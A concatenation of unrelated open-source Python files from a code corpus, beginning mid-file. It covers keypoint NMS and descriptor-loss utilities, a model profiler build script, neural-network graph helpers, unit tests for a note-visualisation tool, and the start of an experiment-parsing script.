inds = np.argsort(pts[2, :])
pts = pts[:, inds[::-1]] # Sort by confidence.
# Remove points along border.
bord = border_remove
toremoveW = np.logical_or(pts[0, :] < bord, pts[0, :] >= (W - bord))
toremoveH = np.logical_or(pts[1, :] < bord, pts[1, :] >= (H - bord))
toremove = np.logical_or(toremoveW, toremoveH)
pts = pts[:, ~toremove]
return pts
def box_nms(prob, size, iou=0.1, min_prob=0.01, keep_top_k=0):
# requires https://github.com/open-mmlab/mmdetection.
# Warning : BUILD FROM SOURCE using command MMCV_WITH_OPS=1 pip install -e
# from mmcv.ops import nms as nms_mmdet
from torchvision.ops import nms
"""Performs non maximum suppression on the heatmap by considering hypothetical
bounding boxes centered at each pixel's location (e.g. corresponding to the receptive
field). Optionally only keeps the top k detections.
Arguments:
prob: the probability heatmap, with shape `[H, W]`.
size: a scalar, the size of the bouding boxes.
iou: a scalar, the IoU overlap threshold.
min_prob: a threshold under which all probabilities are discarded before NMS.
keep_top_k: an integer, the number of top scores to keep.
"""
pts = torch.nonzero(prob > min_prob).float() # [N, 2]
prob_nms = torch.zeros_like(prob)
if pts.nelement() == 0:
return prob_nms
size = torch.tensor(size/2.).cuda()
boxes = torch.cat([pts-size, pts+size], dim=1) # [N, 4]
scores = prob[pts[:, 0].long(), pts[:, 1].long()]
if keep_top_k != 0:
indices = nms(boxes, scores, iou)
else:
raise NotImplementedError
# indices, _ = nms(boxes, scores, iou, boxes.size()[0])
# print("boxes: ", boxes.shape)
# print("scores: ", scores.shape)
# proposals = torch.cat([boxes, scores.unsqueeze(-1)], dim=-1)
# dets, indices = nms_mmdet(proposals, iou)
# indices = indices.long()
# indices = box_nms_retinaNet(boxes, scores, iou)
pts = torch.index_select(pts, 0, indices)
scores = torch.index_select(scores, 0, indices)
prob_nms[pts[:, 0].long(), pts[:, 1].long()] = scores
return prob_nms
def nms_fast(in_corners, H, W, dist_thresh):
"""
Run a faster approximate Non-Max-Suppression on numpy corners shaped:
3xN [x_i,y_i,conf_i]^T
Algo summary: Create a grid sized HxW. Assign each corner location a 1, rest
are zeros. Iterate through all the 1's and convert them either to -1 or 0.
Suppress points by setting nearby values to 0.
Grid Value Legend:
-1 : Kept.
0 : Empty or suppressed.
1 : To be processed (converted to either kept or supressed).
NOTE: The NMS first rounds points to integers, so NMS distance might not
be exactly dist_thresh. It also assumes points are within image boundaries.
Inputs
in_corners - 3xN numpy array with corners [x_i, y_i, confidence_i]^T.
H - Image height.
W - Image width.
dist_thresh - Distance to suppress, measured as an infinty norm distance.
Returns
nmsed_corners - 3xN numpy matrix with surviving corners.
nmsed_inds - N length numpy vector with surviving corner indices.
"""
grid = np.zeros((H, W)).astype(int) # Track NMS data.
inds = np.zeros((H, W)).astype(int) # Store indices of points.
# Sort by confidence and round to nearest int.
inds1 = np.argsort(-in_corners[2, :])
corners = in_corners[:, inds1]
rcorners = corners[:2, :].round().astype(int) # Rounded corners.
# Check for edge case of 0 or 1 corners.
if rcorners.shape[1] == 0:
return np.zeros((3, 0)).astype(int), np.zeros(0).astype(int)
if rcorners.shape[1] == 1:
out = np.vstack((rcorners, in_corners[2])).reshape(3, 1)
return out, np.zeros((1)).astype(int)
# Initialize the grid.
for i, rc in enumerate(rcorners.T):
grid[rcorners[1, i], rcorners[0, i]] = 1
inds[rcorners[1, i], rcorners[0, i]] = i
# Pad the border of the grid, so that we can NMS points near the border.
pad = dist_thresh
grid = np.pad(grid, ((pad, pad), (pad, pad)), mode='constant')
# Iterate through points, highest to lowest conf, suppress neighborhood.
count = 0
for i, rc in enumerate(rcorners.T):
# Account for top and left padding.
pt = (rc[0] + pad, rc[1] + pad)
if grid[pt[1], pt[0]] == 1: # If not yet suppressed.
grid[pt[1] - pad:pt[1] + pad + 1, pt[0] - pad:pt[0] + pad + 1] = 0
grid[pt[1], pt[0]] = -1
count += 1
# Get all surviving -1's and return sorted array of remaining corners.
keepy, keepx = np.where(grid == -1)
keepy, keepx = keepy - pad, keepx - pad
inds_keep = inds[keepy, keepx]
out = corners[:, inds_keep]
values = out[-1, :]
inds2 = np.argsort(-values)
out = out[:, inds2]
out_inds = inds1[inds_keep[inds2]]
return out, out_inds
def compute_valid_mask(image_shape, inv_homography, device='cpu', erosion_radius=0):
"""
Compute a boolean mask of the valid pixels resulting from an homography applied to
an image of a given shape. Pixels that are False correspond to bordering artifacts.
A margin can be discarded using erosion.
Arguments:
input_shape: Tensor of rank 2 representing the image shape, i.e. `[H, W]`.
homography: Tensor of shape (B, 8) or (8,), where B is the batch size.
`erosion_radius: radius of the margin to be discarded.
Returns: a Tensor of type `tf.int32` and shape (H, W).
"""
# mask = H_transform(tf.ones(image_shape), homography, interpolation='NEAREST')
# mask = H_transform(tf.ones(image_shape), homography, interpolation='NEAREST')
if inv_homography.dim() == 2:
inv_homography = inv_homography.view(-1, 3, 3)
batch_size = inv_homography.shape[0]
mask = torch.ones(batch_size, 1, image_shape[0], image_shape[1]).to(device)
mask = inv_warp_image_batch(mask, inv_homography, device=device, mode='nearest')
mask = mask.view(batch_size, image_shape[0], image_shape[1])
mask = mask.cpu().numpy()
if erosion_radius > 0:
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (erosion_radius*2,)*2)
for i in range(batch_size):
mask[i, :, :] = cv2.erode(mask[i, :, :], kernel, iterations=1)
return torch.tensor(mask).to(device)
def normPts(pts, shape):
"""
normalize pts to [-1, 1]
:param pts:
tensor (y, x)
:param shape:
tensor shape (y, x)
:return:
"""
pts = pts/shape*2 - 1
return pts
def denormPts(pts, shape):
"""
denormalize pts back to H, W
:param pts:
tensor (y, x)
:param shape:
numpy (y, x)
:return:
"""
pts = (pts+1)*shape/2
return pts
# def subpixel_loss(image, labels, dense_desc, patch_size=8):
# # concat image and dense_desc
# # extract patches
# #
# pass
def descriptor_loss(descriptors, descriptors_warped, homographies, mask_valid=None,
cell_size=8, lamda_d=250, device='cpu', descriptor_dist=4, **config):
'''
Compute descriptor loss from descriptors_warped and given homographies
:param descriptors:
Output from descriptor head
tensor [batch_size, descriptors, Hc, Wc]
:param descriptors_warped:
Output from descriptor head of warped image
tensor [batch_size, descriptors, Hc, Wc]
:param homographies:
known homographies
:param cell_size:
8
:param device:
gpu or cpu
:param config:
:return:
loss, and other tensors for visualization
'''
# put to gpu
homographies = homographies.to(device)
# config
from utils.utils import warp_points
lamda_d = lamda_d # 250
margin_pos = 1
margin_neg = 0.2
batch_size, Hc, Wc = descriptors.shape[0], descriptors.shape[2], descriptors.shape[3]
#####
# H, W = Hc.numpy().astype(int) * cell_size, Wc.numpy().astype(int) * cell_size
H, W = Hc * cell_size, Wc * cell_size
#####
with torch.no_grad():
# shape = torch.tensor(list(descriptors.shape[2:]))*torch.tensor([cell_size, cell_size]).type(torch.FloatTensor).to(device)
shape = torch.tensor([H, W]).type(torch.FloatTensor).to(device)
# compute the center pixel of every cell in the image
coor_cells = torch.stack(torch.meshgrid(torch.arange(Hc), torch.arange(Wc)), dim=2)
coor_cells = coor_cells.type(torch.FloatTensor).to(device)
coor_cells = coor_cells * cell_size + cell_size // 2
## coord_cells is now a grid containing the coordinates of the Hc x Wc
## center pixels of the 8x8 cells of the image
# coor_cells = coor_cells.view([-1, Hc, Wc, 1, 1, 2])
coor_cells = coor_cells.view([-1, 1, 1, Hc, Wc, 2]) # be careful of the order
# warped_coor_cells = warp_points(coor_cells.view([-1, 2]), homographies, device)
warped_coor_cells = normPts(coor_cells.view([-1, 2]), shape)
warped_coor_cells = torch.stack((warped_coor_cells[:,1], warped_coor_cells[:,0]), dim=1) # (y, x) to (x, y)
warped_coor_cells = warp_points(warped_coor_cells, homographies, device)
warped_coor_cells = torch.stack((warped_coor_cells[:, :, 1], warped_coor_cells[:, :, 0]), dim=2) # (batch, x, y) to (batch, y, x)
shape_cell = torch.tensor([H//cell_size, W//cell_size]).type(torch.FloatTensor).to(device)
# warped_coor_mask = denormPts(warped_coor_cells, shape_cell)
warped_coor_cells = denormPts(warped_coor_cells, shape)
# warped_coor_cells = warped_coor_cells.view([-1, 1, 1, Hc, Wc, 2])
warped_coor_cells = warped_coor_cells.view([-1, Hc, Wc, 1, 1, 2])
# print("warped_coor_cells: ", warped_coor_cells.shape)
# compute the pairwise distance
cell_distances = coor_cells - warped_coor_cells
cell_distances = torch.norm(cell_distances, dim=-1)
##### check
# print("descriptor_dist: ", descriptor_dist)
mask = cell_distances <= descriptor_dist # 0.5 # trick
mask = mask.type(torch.FloatTensor).to(device)
# compute the pairwise dot product between descriptors: d^t * d
descriptors = descriptors.transpose(1, 2).transpose(2, 3)
descriptors = descriptors.view((batch_size, Hc, Wc, 1, 1, -1))
descriptors_warped = descriptors_warped.transpose(1, 2).transpose(2, 3)
descriptors_warped = descriptors_warped.view((batch_size, 1, 1, Hc, Wc, -1))
dot_product_desc = descriptors * descriptors_warped
dot_product_desc = dot_product_desc.sum(dim=-1)
## dot_product_desc.shape = [batch_size, Hc, Wc, Hc, Wc, desc_len]
# hinge loss
positive_dist = torch.max(margin_pos - dot_product_desc, torch.tensor(0.).to(device))
# positive_dist[positive_dist < 0] = 0
negative_dist = torch.max(dot_product_desc - margin_neg, torch.tensor(0.).to(device))
# negative_dist[neative_dist < 0] = 0
# sum of the dimension
if mask_valid is None:
# mask_valid = torch.ones_like(mask)
mask_valid = torch.ones(batch_size, 1, Hc*cell_size, Wc*cell_size)
mask_valid = mask_valid.view(batch_size, 1, 1, mask_valid.shape[2], mask_valid.shape[3])
loss_desc = lamda_d * mask * positive_dist + (1 - mask) * negative_dist
loss_desc = loss_desc * mask_valid
# mask_validg = torch.ones_like(mask)
##### bug in normalization
normalization = (batch_size * (mask_valid.sum()+1) * Hc * Wc)
pos_sum = (lamda_d * mask * positive_dist/normalization).sum()
neg_sum = ((1 - mask) * negative_dist/normalization).sum()
loss_desc = loss_desc.sum() / normalization
# loss_desc = loss_desc.sum() / (batch_size * Hc * Wc)
# return loss_desc, mask, mask_valid, positive_dist, negative_dist
return loss_desc, mask, pos_sum, neg_sum
"""
pos_pairs = mask * positive_dist
pos_pairs = pos_pairs[pos_pairs != 0]
print("pos_pairs mean: ", pos_pairs.mean())
print("pos_pairs max: ", pos_pairs.max())
print("pos_pairs min: ", pos_pairs.min())
===
print("pos_pairs mean: ", pos_pairs.mean())
pos_pairs mean: tensor(0.6237, device='cuda:0', grad_fn=<MeanBackward1>)
print("pos_pairs max: ", pos_pairs.max())
pos_pairs max: tensor(1.3984, device='cuda:0', grad_fn=<MaxBackward1>)
print("pos_pairs min: ", pos_pairs.min())
pos_pairs min: tensor(0.1569, device='cuda:0', grad_fn=<MinBackward1>)
(pos_pairs < 0.3).sum()
Out[9]: tensor(88, device='cuda:0')
(pos_pairs < 0.5).sum()
Out[10]: tensor(393, device='cuda:0')
(pos_pairs < 0.7).sum()
Out[11]: tensor(703, device='cuda:0')
"""
def sumto2D(ndtensor):
# input tensor: [batch_size, Hc, Wc, Hc, Wc]
# output tensor: [batch_size, Hc, Wc]
return ndtensor.sum(dim=1).sum(dim=1)
def mAP(pred_batch, labels_batch):
pass
def precisionRecall_torch(pred, labels):
offset = 10**-6
assert pred.size() == labels.size(), 'Sizes of pred, labels should match when you get the precision/recall!'
precision = torch.sum(pred*labels) / (torch.sum(pred)+ offset)
recall = torch.sum(pred*labels) / (torch.sum(labels) + offset)
if precision.item() > 1.:
print(pred)
print(labels)
import scipy.io.savemat as savemat
savemat('pre_recall.mat', {'pred': pred, 'labels': labels})
assert precision.item() <=1. and precision.item() >= 0.
return {'precision': precision, 'recall': recall}
def precisionRecall(pred, labels, thd=None):
offset = 10**-6
if thd is None:
precision = np.sum(pred*labels) / (np.sum(pred)+ offset)
recall = np.sum(pred*labels) / (np.sum(labels) + offset)
return {'precision': precision, 'recall': recall}
def getWriterPath(task='train', exper_name='', date=True):
import datetime
prefix = 'runs/'
str_date_time = ''
if exper_name != '':
exper_name += '_'
if date:
str_date_time = datetime.datetime.now().strftime("%Y-%m-%d_%H:%M:%S")
return prefix + task + '/' + exper_name + str_date_time
def crop_or_pad_choice(in_num_points, out_num_points, shuffle=False):
# Adapted from https://github.com/haosulab/frustum_pointnet/blob/635c938f18b9ec1de2de717491fb217df84d2d93/fpointnet/data/datasets/utils.py
"""Crop or pad point cloud to a fixed number; return the indexes
Args:
points (np.ndarray): point cloud. (n, d)
num_points (int): the number of output points
shuffle (bool): whether to shuffle the order
Returns:
np.ndarray: output point cloud
np.ndarray: index to choose input points
"""
if shuffle:
choice = np.random.permutation(in_num_points)
else:
choice = np.arange(in_num_points)
assert out_num_points > 0, 'out_num_points = %d must be positive int!'%out_num_points
if in_num_points >= out_num_points:
choice = choice[:out_num_points]
else:
num_pad = out_num_points - in_num_points
pad = np.random.choice(choice, num_pad, replace=True)
choice = np.concatenate([choice, pad])
return choice
|
kolibri/core/logger/constants/interaction_types.py
|
MBKayro/kolibri
| 545 |
101698
|
<reponame>MBKayro/kolibri<filename>kolibri/core/logger/constants/interaction_types.py
HINT = "hint"
ANSWER = "answer"
ERROR = "error"
|
tools/utilities/optimizer/profile_builder.py
|
awf/ELL
| 2,094 |
101712
|
#!/usr/bin/env python3
####################################################################################################
#
# Project: Embedded Learning Library (ELL)
# File: profile_builder.py
# Authors: <NAME>
#
# Requires: Python 3.x
#
####################################################################################################
import sys
import argparse
import os
import zipfile
import shutil
import dask
import logger
import find_ell
import optimizer_util
script_path = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.join(script_path, "..", "..", "wrap"))
import wrap
global_logger = logger.setup()
class BuildJob():
def __init__(self, profiler_data, ell_root, ell_build_root, target="pi3", language="cpp", include_exercise_models=False):
self.profiler_data = profiler_data
self.ell_root = ell_root
self.ell_build_root = ell_build_root
self.target = target
self.language = language
self.include_exercise_models = include_exercise_models
def run(self):
model_id_string = "{} ({})".format(self.profiler_data.model_name, self.profiler_data.profile_options.to_long_string())
global_logger = logger.setup(format="{} %(message)s".format(model_id_string))
global_logger.info("Compiling model {} ...".format(model_id_string))
profile_src_path = os.path.join(self.ell_build_root, "tools", "utilities", "profile")
# Take all .cpp, .h, .cmd, .sh, and .cmake files from the build/tools/utilities/profile directory, and only hard-code the CMakeLists file to take
all_profile_files = os.listdir(profile_src_path)
profile_extensions_to_deploy = [".cpp", ".h", ".cmd", ".sh", ".cmake"]
profile_src_files = [filename for filename in all_profile_files if True in [filename.endswith(ext) for ext in profile_extensions_to_deploy]]
cmakelists_file_to_deploy = "CMakeLists-device-parallel.txt.in"
profile_src_files.append(cmakelists_file_to_deploy)
profile_src_file_renames = {
cmakelists_file_to_deploy : "CMakeLists.txt"
}
base_wrap_args = [
"--model_file",
self.profiler_data.model_path,
"--module_name",
"ELL", # Profiler C++ code assumes the module name is ELL
"--target",
self.target,
"--language",
self.language,
"--outdir",
self.profiler_data.built_profilers_path,
]
base_wrap_args.extend(self.profiler_data.profile_options.base_wrap_args())
opt_wrap_args = [
"--llvm_format",
"ir"
]
no_opt_wrap_args = [
"--no_opt_tool",
"--no_llc_tool",
"--llvm_format",
"obj"
]
profile_wrap_args = ["--profile"]
profile_options_additional_compile_args = self.profiler_data.profile_options.additional_compile_args()
if profile_options_additional_compile_args:
additional_compile_args = ["--"] + profile_options_additional_compile_args
else:
additional_compile_args = []
no_opt_noprofile_builder = wrap.ModuleBuilder()
no_opt_noprofile_wrap_args = base_wrap_args + no_opt_wrap_args + additional_compile_args
no_opt_noprofile_builder.parse_command_line(no_opt_noprofile_wrap_args)
no_opt_profile_builder = wrap.ModuleBuilder()
no_opt_profile_wrap_args = base_wrap_args + no_opt_wrap_args + profile_wrap_args + additional_compile_args
no_opt_profile_builder.parse_command_line(no_opt_profile_wrap_args)
opt_noprofile_builder = wrap.ModuleBuilder()
opt_noprofile_wrap_args = base_wrap_args + opt_wrap_args + additional_compile_args
opt_noprofile_builder.parse_command_line(opt_noprofile_wrap_args)
opt_profile_builder = wrap.ModuleBuilder()
opt_profile_wrap_args = base_wrap_args + opt_wrap_args + profile_wrap_args + additional_compile_args
opt_profile_builder.parse_command_line(opt_profile_wrap_args)
# Profiler and ExecuteModel binaries expect to find the following header and object files, built with different compile args:
# compiled_model.o
# compiled_model.h
# compiled_model_opt.o
# compiled_model_opt.h
# compiled_model_noprofile.o
# compiled_model_noprofile.h
# compiled_model_noprofile_opt.o
# compiled_model_noprofile_opt.h
built_name_prefix = "compiled_model"
noprofile_suffix = "_noprofile"
opt_suffix = "_opt"
obj_suffix = ".o"
header_suffix = ".h"
file_suffixes = [obj_suffix, header_suffix]
base_model_filename = os.path.basename(self.profiler_data.model_path)
base_model_name = os.path.splitext(base_model_filename)[0]
no_opt_noprofile_renames = { (base_model_name + file_suffix) : (built_name_prefix + noprofile_suffix + file_suffix) for file_suffix in file_suffixes }
no_opt_profile_renames = { (base_model_name + file_suffix) : (built_name_prefix + file_suffix) for file_suffix in file_suffixes }
opt_noprofile_renames = { (base_model_name + file_suffix) : (built_name_prefix + noprofile_suffix + opt_suffix + file_suffix) for file_suffix in file_suffixes }
opt_profile_renames = { (base_model_name + file_suffix) : (built_name_prefix + opt_suffix + file_suffix) for file_suffix in file_suffixes }
builders_and_rename_maps = [
(no_opt_profile_builder, no_opt_profile_renames),
(opt_profile_builder, opt_profile_renames)
]
if self.include_exercise_models:
builders_and_rename_maps.extend([
(no_opt_noprofile_builder, no_opt_noprofile_renames),
(opt_noprofile_builder, opt_noprofile_renames)
])
target_files = []
for builder_and_rename_map in builders_and_rename_maps:
target_files.extend([builder_and_rename_map[1][filename] for filename in builder_and_rename_map[1]])
existing_files = os.listdir(self.profiler_data.built_profilers_path)
need_to_build = False in [filename in existing_files for filename in target_files]
if need_to_build:
try:
for builder_and_rename_map in builders_and_rename_maps:
builder = builder_and_rename_map[0]
rename_map = builder_and_rename_map[1]
builder.run()
for filename in rename_map:
src_path = os.path.join(self.profiler_data.built_profilers_path, filename)
dst_path = os.path.join(self.profiler_data.built_profilers_path, rename_map[filename])
shutil.copy(src_path, dst_path)
except:
errorType, value, traceback = sys.exc_info()
msg = "### WrapException: %s: %s" % (str(errorType), str(value))
global_logger.error(msg)
sys.exit(1)
else:
global_logger.info("Target files already exist in path {}, skipping build".format(self.profiler_data.built_profilers_path))
keep_files = target_files
# Copy profile source code into place
for filename in profile_src_files:
src_path = os.path.join(profile_src_path, filename)
dst_name = profile_src_file_renames[filename] if filename in profile_src_file_renames else filename
dst_path = os.path.join(self.profiler_data.built_profilers_path, dst_name)
keep_files.append(dst_name)
shutil.copy(src_path, dst_path)
all_built_files = os.listdir(self.profiler_data.built_profilers_path)
delete_files = [filename for filename in all_built_files if filename not in keep_files]
for filename in delete_files:
full_path = os.path.join(self.profiler_data.built_profilers_path, filename)
if os.path.isfile(full_path):
global_logger.info("Cleaning temporary build file {}".format(full_path))
os.remove(full_path)
global_logger.info("Done compiling model {}.".format(model_id_string))
def build_model_profilers(model_path, output_path, ell_root, ell_build_root, all_profile_options, models=None, target="pi3", parallel_count=1, include_exercise_models=False):
os.makedirs(output_path, exist_ok=True)
all_profiler_data = optimizer_util.make_profiler_data(model_path, output_path, all_profile_options, models)
build_jobs = [BuildJob(profiler_data, ell_root, ell_build_root, target) for profiler_data in all_profiler_data]
values = [dask.delayed(job.run)() for job in build_jobs]
if len(build_jobs) < parallel_count:
parallel_count = len(build_jobs)
global_logger.info("Compiling {} models with {} processes".format(len(build_jobs), parallel_count))
results = dask.compute(*values, scheduler="processes", num_workers=parallel_count)
return all_profiler_data
def add_profile_builder_args(arg_parser):
arg_parser.add_argument("--parallel_build", help="The maximum number of build processes to run in parallel.", default=4, type=int)
arg_parser.add_argument("--include_exercise_models", help="Build and run the exercise_models executables that don't have profiling enabled", default=False, action="store_true")
if __name__ == "__main__":
parser = argparse.ArgumentParser("Build model profilers with different convolution configurations")
parser.add_argument("--output_path", "-o", help="Path to store built profiler object files in", required=True)
add_profile_builder_args(parser)
find_ell.add_ell_root_args(parser)
optimizer_util.add_all_shared_args(parser)
args = parser.parse_args()
if not args.ell_root:
raise Exception("ELL root not found")
if not args.ell_build_root:
raise Exception("ELL build root not found")
all_profile_options = optimizer_util.ProfileOptions.parse_option_list_from_file(args.options)
build_model_profilers(model_path=args.model_path,
output_path=args.output_path,
ell_root=args.ell_root,
ell_build_root=args.ell_build_root,
target=args.target,
all_profile_options=all_profile_options,
models=args.models,
parallel_count=args.parallel_build,
include_exercise_models=args.include_exercise_models)
|
nnef_tools/model/utils.py
|
KhronosGroup/NNEF-Tools
| 193 |
101727
|
# Copyright (c) 2020 The Khronos Group Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
def _split_counter_from_name(str):
if len(str) > 0 and not str[-1].isdigit():
return str, None
i = len(str)
while i > 0:
if not str[i-1].isdigit():
return str[:i], int(str[i:])
i -= 1
return None, int(str)
def generate_tensor_names_from_op_type(graph, keep_io_names=False):
used_names = set()
if keep_io_names:
used_names.update(tensor.name for tensor in graph.inputs if tensor.name is not None)
used_names.update(tensor.name for tensor in graph.outputs if tensor.name is not None)
op_counts = {}
for op in graph.operations:
for tensor in op.outputs:
if keep_io_names and tensor.name is not None and (tensor in graph.inputs or tensor in graph.outputs):
continue
idx = op_counts.get(op.type, 0) + 1
while op.type + str(idx) in used_names:
idx += 1
op_counts[op.type] = idx
tensor.name = op.type + str(idx)
for tensor in graph.tensors:
if tensor.producer is None:
tensor.name = None
def generate_missing_tensor_names_from_op_type(graph):
counters = {}
for tensor in graph.tensors:
if tensor.name is not None:
name, count = _split_counter_from_name(tensor.name)
if name is not None and count is not None:
counters[name] = max(counters.get(name, 0), count)
for tensor in graph.tensors:
if tensor.name is None and tensor.producer is not None:
op = tensor.producer
idx = counters.get(op.type, 0) + 1
counters[op.type] = idx
tensor.name = op.type + str(idx)
def generate_op_names_from_op_type(graph):
op_counts = {}
for op in graph.operations:
idx = op_counts.get(op.type, 0) + 1
op_counts[op.type] = idx
op.name = op.type + str(idx)
def replace_tensor_in_graph_inputs(graph, old_tensor, new_tensor):
graph.inputs = [new_tensor if t is old_tensor else t for t in graph.inputs]
def replace_tensor_in_graph_outputs(graph, old_tensor, new_tensor):
graph.outputs = [new_tensor if t is old_tensor else t for t in graph.outputs]
def replace_tensor_in_consumers(graph, old_tensor, new_tensor):
for consumer in list(old_tensor.consumers): # copy list to avoid changes during iteration
sequence = tuple if isinstance(consumer.inputs, tuple) else list
consumer.inputs = sequence(new_tensor if t is old_tensor else t for t in consumer.inputs)
replace_tensor_in_graph_outputs(graph, old_tensor, new_tensor)
def replace_tensor_in_producers(graph, old_tensor, new_tensor):
for producer in list(old_tensor.producers): # copy list to avoid changes during iteration
sequence = tuple if isinstance(producer.outputs, tuple) else list
producer.outputs = sequence(new_tensor if t is old_tensor else t for t in producer.outputs)
replace_tensor_in_graph_inputs(graph, old_tensor, new_tensor)
def bypass_and_remove(graph, op, remove_input_not_output=False):
assert len(op.outputs) == 1 and len(op.inputs) == 1
op_input = op.input
op_output = op.output
graph.remove_operation(op, unlink=True)
if remove_input_not_output:
replace_tensor_in_consumers(graph, op_input, op_output)
replace_tensor_in_producers(graph, op_input, op_output)
graph.remove_tensor(op_input)
else:
replace_tensor_in_consumers(graph, op_output, op_input)
replace_tensor_in_producers(graph, op_output, op_input)
graph.remove_tensor(op_output)
def replace_chain(graph, types, func, allow_forks=False):
def _match_type(type, template):
return type in template if isinstance(template, set) else type == template
def _match_link(op, template, is_last):
return _match_type(op.type, template) and (len(op.outputs) == 1 or is_last)
def _match_chain(op, types, allow_forks):
if not _match_link(op, types[0], is_last=len(types) == 1):
return None
chain = [op]
tensor = op.output
for idx, type in enumerate(types[1:]):
is_last = idx + 1 == len(types) - 1
if not allow_forks and len(tensor.consumers) > 1:
return None
op = next((consumer for consumer in tensor.consumers if _match_link(consumer, type, is_last)), None)
if op is None:
return None
chain.append(op)
if not is_last:
tensor = op.output
return chain
changed = False
i = 0
while i < len(graph.operations):
count = len(graph.operations)
chain = _match_chain(graph.operations[i], types, allow_forks)
if chain is not None and func(*chain) is not False:
k = i
while graph.operations[k] is not chain[-1]:
k += 1
for j in range(count, len(graph.operations)):
graph.move_operation(j, k)
k += 1
offs = len(chain) - 1
while offs > 0 and len(chain[offs - 1].output.consumers) == 1:
offs -= 1
interns = [op.output for op in chain[offs:-1]]
graph.remove_operations(chain[offs:], unlink=True)
graph.remove_tensors(interns)
changed = True
else:
i += 1
return changed
def remove_unreachable(graph):
visited = {tensor.producer for tensor in graph.outputs}
queue = list(visited)
k = 0
while k < len(queue):
op = queue[k]
k += 1
for tensor in op.inputs:
if tensor.producer is not None and tensor.producer not in visited and \
(tensor not in graph.inputs or len(tensor.producer.inputs) == 0):
visited.add(tensor.producer)
queue.append(tensor.producer)
graph.remove_operations({op for op in graph.operations if op not in visited}, unlink=True)
graph.remove_tensors({tensor for tensor in graph.tensors
if len(tensor.producers) == 0 and len(tensor.consumers) == 0
and tensor not in graph.inputs and tensor not in graph.outputs})
|
tests/test_zkviz.py
|
ktw5691/zkviz
| 105 |
101750
|
from pathlib import Path
from tempfile import TemporaryDirectory
from unittest import TestCase
from zkviz import zkviz
class TestListZettels(TestCase):
def test_list_zettels_with_md_extension(self):
# Create a temporary folder and write files in it
with TemporaryDirectory() as tmpdirname:
ext = ".md"
basename = "201906242157"
filepaths = []
for i in range(3):
path = Path(tmpdirname, basename + str(i) + ext)
path.touch()
filepaths.append(str(path))
files_found = zkviz.list_zettels(tmpdirname)
self.assertEqual(filepaths, files_found)
def test_list_zettels_with_txt_extension(self):
# Create a temporary folder and write files in it
with TemporaryDirectory() as tmpdirname:
ext = ".txt"
basename = "201906242157"
filepaths = []
for i in range(3):
path = Path(tmpdirname, basename + str(i) + ext)
path.touch()
filepaths.append(str(path))
files_found = zkviz.list_zettels(tmpdirname, "*.txt")
self.assertEqual(filepaths, files_found)
def test_list_zettels_with_mixed_extensions(self):
# Create a temporary folder and write files in it
with TemporaryDirectory() as tmpdirname:
filepaths = []
basename = "201906242157"
ext = ".txt"
for i in range(5):
path = Path(tmpdirname, basename + str(i) + ext)
path.touch()
filepaths.append(str(path))
ext = ".md"
for i in range(5, 10):
path = Path(tmpdirname, basename + str(i) + ext)
path.touch()
filepaths.append(str(path))
files_found = zkviz.list_zettels(tmpdirname, "*.txt|*.md")
self.assertEqual(filepaths, files_found)
class TestParseArgs(TestCase):
def test_default_extension(self):
args = zkviz.parse_args("")
self.assertEqual(["*.md"], args.pattern)
def test_overwrite_extension(self):
args = zkviz.parse_args(["--pattern", "*.txt"])
self.assertEqual(["*.txt"], args.pattern)
def test_multiple_extensions(self):
args = zkviz.parse_args(["--pattern", "*.txt", "--pattern", "*.md"])
self.assertEqual(["*.txt", "*.md"], args.pattern)
|
rpython/translator/goal/targetgcbench.py
|
nanjekyejoannah/pypy
| 381 |
101758
|
<gh_stars>100-1000
from rpython.translator.goal import gcbench
from rpython.memory.test.test_transformed_gc import MyGcHooks, GcHooksStats
# _____ Define and setup target ___
GC_HOOKS_STATS = GcHooksStats()
def entry_point(argv):
GC_HOOKS_STATS.reset()
ret = gcbench.entry_point(argv)
minors = GC_HOOKS_STATS.minors
steps = GC_HOOKS_STATS.steps
collects = GC_HOOKS_STATS.collects
print 'GC hooks statistics'
print ' gc-minor: ', minors
print ' gc-collect-step: ', steps
print ' gc-collect: ', collects
return ret
def get_gchooks():
return MyGcHooks(GC_HOOKS_STATS)
def target(*args):
gcbench.ENABLE_THREADS = False # not RPython
return entry_point, None
|
ml-models-analyses/readahead-mixed-workload/parse-experiments-with-faults.py
|
drewscottt/kernel-ml
| 167 |
101784
|
<filename>ml-models-analyses/readahead-mixed-workload/parse-experiments-with-faults.py
#!/usr/bin/env python3.9
#
# Copyright (c) 2019-2021 <NAME>
# Copyright (c) 2021-2021 <NAME>
# Copyright (c) 2021-2021 <NAME>
# Copyright (c) 2021-2021 <NAME>
# Copyright (c) 2020-2021 <NAME>
# Copyright (c) 2020-2021 <NAME>
# Copyright (c) 2019-2021 <NAME>
# Copyright (c) 2019-2021 Stony Brook University
# Copyright (c) 2019-2021 The Research Foundation of SUNY
#
# You can redistribute it and/or modify it under the terms of the Apache License,
# Version 2.0 (http://www.apache.org/licenses/LICENSE-2.0).
#
from collections import defaultdict
# import pandas as pd
# pandas makes it easy to calculate mean perf diff
# but plotting through pandas is hard because we need to use subplots
# but each subplot needs its own x vector because the data isn't sampled exactly every second
# in fact it can be as bad as every other second, so one graph might be stretched more
# I'm not sure how to do this with the pandas plot function...
import argparse
import os
import matplotlib.pyplot as plt
from matplotlib import rc
from enum import Enum
from kmlparsing import *
import sys
import csv
#rc('font', **{'family': 'Calibri'})
class BMType(Enum):
KML_SEQ = 0
KML_RAND = 1
VAN_SEQ = 2
VAN_RAND = 3
RA = 4
KML_SEQ_MAJ = 5
KML_RAND_MAJ = 6
VAN_SEQ_MAJ = 7
VAN_RAND_MAJ = 8
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='Parse and compare experiments')
parser.add_argument(
'--kml_seq_file',
dest='kml_seq_file',
required=False,
default='detail-kml-seq.txt',
help='relative path to sequential detail file for kml experiments')
parser.add_argument(
'--kml_rand_file',
dest='kml_rand_file',
required=False,
default='detail-kml-rand.txt',
help='relative path to random detail file for kml experiments')
parser.add_argument(
'--vanilla_seq_file',
dest='vanilla_seq_file',
required=False,
default='detail-vanilla-seq.txt',
